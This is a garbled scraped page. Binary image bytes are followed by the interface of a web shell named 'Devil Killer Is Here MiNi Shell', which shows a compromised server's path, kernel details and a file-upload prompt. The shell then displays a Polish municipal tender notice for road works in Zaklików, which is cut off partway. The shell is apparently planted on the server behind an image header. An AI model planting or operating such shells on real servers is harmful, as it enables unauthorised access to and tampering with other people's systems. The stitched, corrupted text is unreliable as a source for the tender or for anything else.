JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220105/0000668301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa, przebudowa i modernizacja dróg gminnych i wewnętrznych w gminie Zaklików </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zaklików</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409130</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zachodnia 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zaklików</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-470</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zaklikow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zaklikow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa, przebudowa i modernizacja dróg gminnych i wewnętrznych w gminie Zaklików </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aca2836b-6e16-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00006683</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00004379/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.27 Budowa, przebudowa, modernizacja dróg wewnętrznych w Gminie Zaklików w miejscowościach: Lipa, Łysaków Kolonia, Józefów, Antoniówka i Zaklików</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zaklikow.ezamawiajacy.pl/pn/zaklikow/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> https://zaklikow.ezamawiajacy.pl/pn/zaklikow/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zaklikow.ezamawiajacy.pl/pn/zaklikow/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/> 2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach: txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/> 3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/> 1) drogą elektroniczną na adres email:zamowienia@zaklikow.pl;<br/> 2) poprzez Platformę, dostępną pod adresem:https://zaklikow.ezamawiajacy.pl zakładka Korespondencja.<br/> 4. Ogólne zasady korzystania z Platformy:<br/> 1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gminy Zaklików https://zaklikow.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/> 2) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. <br/> 3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej.<br/> 4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. <br/> 5) Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. <br/> 6) Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, Zamawiający przekaże Wykonawcom za pośrednictwem Platformy Zakupowej.<br/> 7) Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gminy Zaklików tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl.<br/> 5. Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/> 1) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/> 2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) administratorem Pani/Pana danych osobowych jest<br/>Gmina Zaklików ul. Zachodnia 15, 37 – 470 Zaklików, tel. 15 8738476, email: sekretariat@zaklikow.pl,<br/>reprezentowana przez Burmistrza Dariusza Toczyskiego.<br/>2) Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Gminy Zaklików oraz spółka<br/>Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisana<br/>do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla<br/>m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem<br/>KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej<br/>3) Administrator danych osobowych informuje, iż został powołany Inspektor ochrony danych, którego<br/>funkcję pełni Pan Mariusz Kwaśnik. Kontakt z Inspektorem jest możliwy za pośrednictwem poczty<br/>elektronicznej: iod@valven.pl lub pisemnie na adres siedziby Administratora danych, wskazany<br/>powyżej.<br/>4) Pani/Pana dane osobowe będą przetwarzane w celu związanym z przeprowadzeniem postępowania<br/>o udzielenie zamówienia publicznego, którego wartość jest równa lub przekracza kwotę 130 000 zł<br/>netto w trybie podstawowym o jakim stanowi art. 275 pkt 1 p.z.p. wyłonienia wykonawcy, realizacji<br/>umowy, ewentualnego dochodzenia roszczeń i obrony przed roszczeniami.<br/>5) Administrator będzie przetwarzać Państwa dane osobowe na podstawie:<br/>a) art. 6 ust. 1 lit. c RODO ponieważ jest to niezbędne do wypełnienia obowiązku prawnego ciążącego<br/>na Administratorze wynikającego z:<br/>-ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych,<br/>- ustawy z dnia 27 sierpnia 2009 roku o finansach publicznych,<br/>- ustawy z dnia 29 września 1994 r. o rachunkowości.<br/>b) art. 6 ust. 1 lit. b RODO – przetwarzanie jest niezbędne do wykonania umowy, której stroną jest<br/>osoba, której dane dotyczą lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed<br/>zawarciem umowy.<br/>Pani/ Pana dane osobowe na podstawie art. 6 ust. ust. 1 lit. b RODO będziemy przetwarzać jeśli jest<br/>Pani/ Pan stroną umowy.<br/>c) art. 6 ust. 1 lit. f RODO-przetwarzanie jest niezbędne do celów wynikających z prawnie<br/>uzasadnionych interesów realizowanych przez Administratora lub przez stronę trzecią.<br/>Pani/ Pana dane, w związku z tym, że jest Pani/ Pan pracownikiem, współpracownikiem Wykonawcy<br/>będą przetwarzane w celach kontaktowych w związku z komunikacją z potencjalnym Zleceniobiorcą,<br/>podjęciem czynności przed zawarciem umowy a także czynności związanych z realizacją umowy.<br/>Na tej podstawie będziemy również przetwarzać Pani / Pana dane w związku z obroną przed<br/>ewentualnymi roszczeniami.<br/>6) Będziemy przetwarzać następujące Pani/ Pana dane osobowe: imię i nazwisko, pełnioną funkcję,<br/>stanowisko, nazwę i adres firmy/instytucji, którą Pani/ Pan reprezentuje, numer telefonu, adres email.<br/>Mogą wystąpić przypadki w których Administrator będzie przetwarzał dane: numer uprawnień<br/>zawodowych, dane zawarte w udzielanych pełnomocnictwach, informacje dotyczące doświadczenia<br/>zawodowego, numer rachunku bankowego, opinie związane z realizacją umowy.<br/>7) Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym, wynikającym<br/>bezpośrednio z przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego i stanowi warunek<br/>uczestnictwa w przetargu oraz gdy dana oferta zostanie wybrana jest warunkiem zawarcia umowy.<br/>Niepodanie danych może skutkować brakiem zakwalifikowania do uczestnictwa w postępowaniu.<br/>8) Administrator przechowuje protokół postępowania wraz z załącznikami przez okres 5 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>Administrator przechowuje umowę w sprawie zamówienia publicznego przez okres 10 lat.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan prawo do:<br/>a) żądania od Administratora dostępu do danych osobowych oraz otrzymania ich kopii na podstawie<br/>art. 15 RODO*,<br/>b) prawo do sprostowania Pani/Pana danych osobowych na podstawie art. 16 RODO**,<br/>c) prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>Ogłoszenie nr 2021/BZP 00201680/01 z dnia 2021-10-04<br/>2021-10-04 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>przypadków, o których mowa w art. 18 ust. 2 RODO***.<br/>d) prawo do usunięcia danych w prawo do żądania usunięcia danych osobowych, w sytuacji gdy<br/>przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu<br/>prawa wskazanego w art. 6 ust. 1 lit. c RODO (art. 17 RODO),<br/>e) prawo do przenoszenia danych osobowych, gdy przetwarzanie odbywa się na podstawie art. 6 ust. 1<br/>lit. b RODO oraz przetwarzanie odbywa się w sposób zautomatyzowany (art. 20 RODO),<br/>f) prawo do sprzeciwu wobec przetwarzania danych Pani/Pana dotyczących, gdy przetwarzanie danych<br/>odbywa się na podstawie art. 6 ust.1 lit. f RODO (art. 21 RODO).<br/>Zakres każdego z tych praw oraz sytuacje, z których można z nich skorzystać, wynikają z przepisów<br/>RODO. Z praw tych może Pani/Pan skorzystać składając wniosek u Administratora.<br/>2) Przysługuje Pani/Panu prawo do złożenia skargi do organu nadzorczego – Prezesa Urzędu Ochrony<br/>Danych, ul. Stawki 2, 00-193 Warszawa.<br/>3) Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany w tym również w<br/>formie profilowania.<br/>4) Pani/Pana dane osobowe nie będą przekazane odbiorcy w państwie trzecim lub organizacji<br/>międzynarodowej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IN.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie budowy, przebudowy i modernizacji dróg gminnych i wewnętrznych w gminie Zaklików polegającej na wykonaniu nowej nawierzchni asfaltowej na 2,5 km dróg o średniej szerokości 3,5 m na podbudowie kamiennej po uprzednim profilowaniu i uzupełnieniu podbudowy kruszywem kamiennym wraz z utwardzeniem poboczy w zakresie wymienionych poniżej zadań inwestycyjnych.<br/> 2. Planowany zakres robót budowlanych obejmuje w szczególności: <br/>2.1. Zadanie nr 1 - Przebudowa i modernizacja drogi gminnej 101417R ul. Spacerowa w m-ci Lipa: <br/>2.1.1. Przebudowa drogi na odcinku od km 0+543,0 do km 0+678:<br/>a) roboty przygotowawcze i rozbiórkowe : odtworzenie trasy i punktów wysokościowych, rozbiórka przepustów z rur betonowych, rozbiórka nawierzchni asfaltowej z wywozem materiałów z rozbiórki, rozbiórka krawężnika betonowego,<br/>b) elementy odwodnienia: regulacja pionowa zaworów wodociągowych lub gazowych, regulacja pionowa studni i wpustów położonych w jezdni, wykonanie studni rewizyjnych betonowych, kanały z rur strukturalnych, trójniki 90 stopni na kanale fi 500, wykonanie części przelotowej przepustów pod jezdnią,<br/>c) podbudowa jezdni: koryto wykonane na całej szerokości jezdni, podbudowa jezdni z kruszywa łamanego<br/>d) nawierzchnie i elementy ulic: wykonanie warstwy wiążącej i warstwy ścieralnej z mieszanki mineralno – asfaltowo grysowej, wykonanie umocnienia pobocza z kruszywa łamanego, wykonanie nawierzchni z kostki brukowej betonowej na podsypce cementowo – piaskowej, ustawienie krawężników betonowych <br/>e) inne – inwentaryzacja powykonawcza<br/>2.1.2. Remont i modernizacja drogi na odcinku od km 0+677 do km 0+857,5<br/>a) roboty przygotowawcze i rozbiórkowe : odtworzenie trasy i punktów wysokościowych, <br/>b) elementy odwodnienia: regulacja pionowa zaworów wodociągowych lub gazowych, regulacja pionowa studni i wpustów położonych w jezdni, <br/>c) podbudowa jezdni: koryto wykonane na całej szerokości jezdni, podbudowa jezdni z kruszywa łamanego<br/>d) nawierzchnie i elementy ulic: wykonanie warstwy wiążącej i warstwy ścieralnej z mieszanki mineralno – asfaltowo grysowej, wykonanie umocnienia pobocza z kruszywa łamanego, umocnienie skarpy rowu od strony jezdni płytami ażurowymi na podsypce cementowo – piaskowej, odmulenie rowów wraz z profilowaniem skarp i wywiezieniem urobku<br/>e) oznakowanie: ustawienie słupków z rur stalowych, przymocowanie do gotowych słupków znaków i tabliczek <br/>f) inne – inwentaryzacja powykonawcza <br/>2.2. Zadanie nr 2 - Przebudowa drogi wewnętrznej ul. Kościelna 2 w m-ci Lipa:<br/>a) Roboty przygotowawcze: roboty pomiarowe przy liniowych robotach ziemnych, trasa dróg w terenie równinnym – wytyczenie granic oraz drogi w terenie,<br/>b) podbudowy: mechaniczne wykonanie koryta na całej szerokości jezdni, wykonanie dolnej i górnej warstwy podbudowy z kruszywa łamanego<br/>c) nawierzchnie: wykonanie warstwy wyrównawczej i warstwy ścieralnej z masy minieralno – asfaltowo grysowej <br/>d) roboty wykończeniowe i inne: wykonanie umocnienia pobocza z kruszywa łamanego wraz z wyprofilowaniem istniejącego gruntu, zagęszczeniem i wyprofilowaniem poboczy, regulacja pionowa zaworów wodociągowych i studni kanalizacyjnych lub gazowych, inwentaryzacja powykonawcza. <br/>2.3. Zadanie nr 3 - Budowa drogi gminnej w miejscowości Łysaków Kolonia w km 1+439,36 do km 1+748,00: <br/>a)	roboty przygotowawcze: odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych, wycinka zakrzaczeń, karczowanie krzaków i poszycia wraz z wywiezieniem i utylizacją, zdjęcie ziemi urodzajnej wraz zagospodarowaniem pozyskanego gruntu w rejonie robót , zabezpieczenie istniejących sieci <br/>b)	podbudowy: wykonanie koryta drogi, profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne, wykonanie podbudowy zasadniczej z gruntu stabilizowanego cementem, wykonanie górnej warstwy podbudowy z kruszywa łamanego,<br/>c) nawierzchnie: wykonanie warstwy wiążącej i warstwy ścieralnej z mieszanki mineralno – asfaltowo grysowej, uzupełninie poboczy kruszywem łamanym niesortowanym<br/>d) roboty wykończeniowe i inne: wykonanie oznakowani pionowego ( znaki, tabliczki wraz ze słupkami), inwentaryzacja powykonawcza<br/>2.4. Zadanie nr 4 - Przebudowa drogi wewnętrznej w miejscowości Łysaków Kolonia na dz. nr ewid. 35, 96/6, 89, 162:<br/>a) roboty przygotowawcze i rozbiórkowe: odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych ( drogi ) w terenie równinnym, mechaniczne karczowanie pni drzew, usunięcie warstwy urodzajnej ( humusu) <br/>b) elementy odwodnienia: regulacja pionowa zaworów wodociągowych lub gazowych, <br/>c) podbudowa jezdni: mechaniczne wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne nawierzchni, wykonanie podbudowy z kruszywa łamanego<br/>d) nawierzchnie i elementy ulic: wykonanie warstwy wiążącej i warstwy ścieralnej z masy minieralno – asfaltowo grysowej, wykonanie umocnienia pobocza z kruszywa łamanego<br/>e) inne: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie do gotowych słupków znaków i tabliczek, inwentaryzacja powykonawcza.<br/>2.5. Zadanie nr 5 - Przebudowa drogi wewnętrznej ul. Anny Nagórskiej w Zaklikowie na dz. nr ewid. 3252/1 i 3258/1:<br/>a) roboty przygotowawcze i rozbiórkowe: odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych ( drogi ) w terenie równinnym<br/>b) podbudowa jezdni: wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża, warstwa odcinająca z piasku, wykonanie podbudowy z kruszywa łamanego<br/>c) nawierzchnie i elementy ulic: wykonanie nawierzchni z kostki brukowej betonowej, ustawienie krawężników betonowych, wykonanie warstwy wiążącej i warstwy ścieralnej z masy minieralno – asfaltowo grysowej, <br/>d) oznakowanie: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie do gotowych słupków znaków i tabliczek, oznakowanie poziome jezdni materiałami cienkowarstwowymi<br/>e) inne: regulacja pionowa zaworów wodociągowych lub gazowych, regulacja studni kanalizacji sanitarnej, montaż rur osłonowych, odmulenie rowu wraz z plantowaniem skarp, inwentaryzacja powykonawcza.<br/>2.6. Zadanie nr 6 - Przebudowa drogi wewnętrznej na dz. nr ewid. 3241 w m-ci Zaklików:<br/>a) roboty przygotowawcze i rozbiórkowe: odtworzenie trasy i punktów wysokościowych przy <br/> liniowych robotach ziemnych ( drogi ) w terenie równinnym<br/>b) elementy odwodnienia: regulacja pionowa zaworów wodociągowych lub gazowych, montaż rur osłonowych dwudzielnych, montaż studni SKR-1 – studnia dwuelementowa przelotowa z wbudowaną ramą stalową wraz z pokrywą na istniejącej sieci tp, regulacja pionowa studni teleskopowych kanalizacji sanitarnej<br/>c) podbudowa jezdni: mechaniczne wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne nawierzchni, wykonanie podbudowy z kruszywa łamanego,<br/>d) nawierzchnie i elementy ulic: wykonanie warstwy wiążącej i warstwy ścieralnej z masy minieralno – asfaltowo grysowej, wykonanie umocnienia pobocza z kruszywa łamanego<br/>e) inne: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie do gotowych słupków znaków i tabliczek, inwentaryzacja powykonawcza.<br/>2.7. Zadanie nr 7 - Przebudowa drogi wewnętrznej w m-ci Antoniówka na dz. nr ewid. 2508:<br/>a) roboty przygotowawcze i rozbiórkowe: odtworzenie trasy i punktów wysokościowych przy <br/> liniowych robotach ziemnych ( drogi ) w terenie 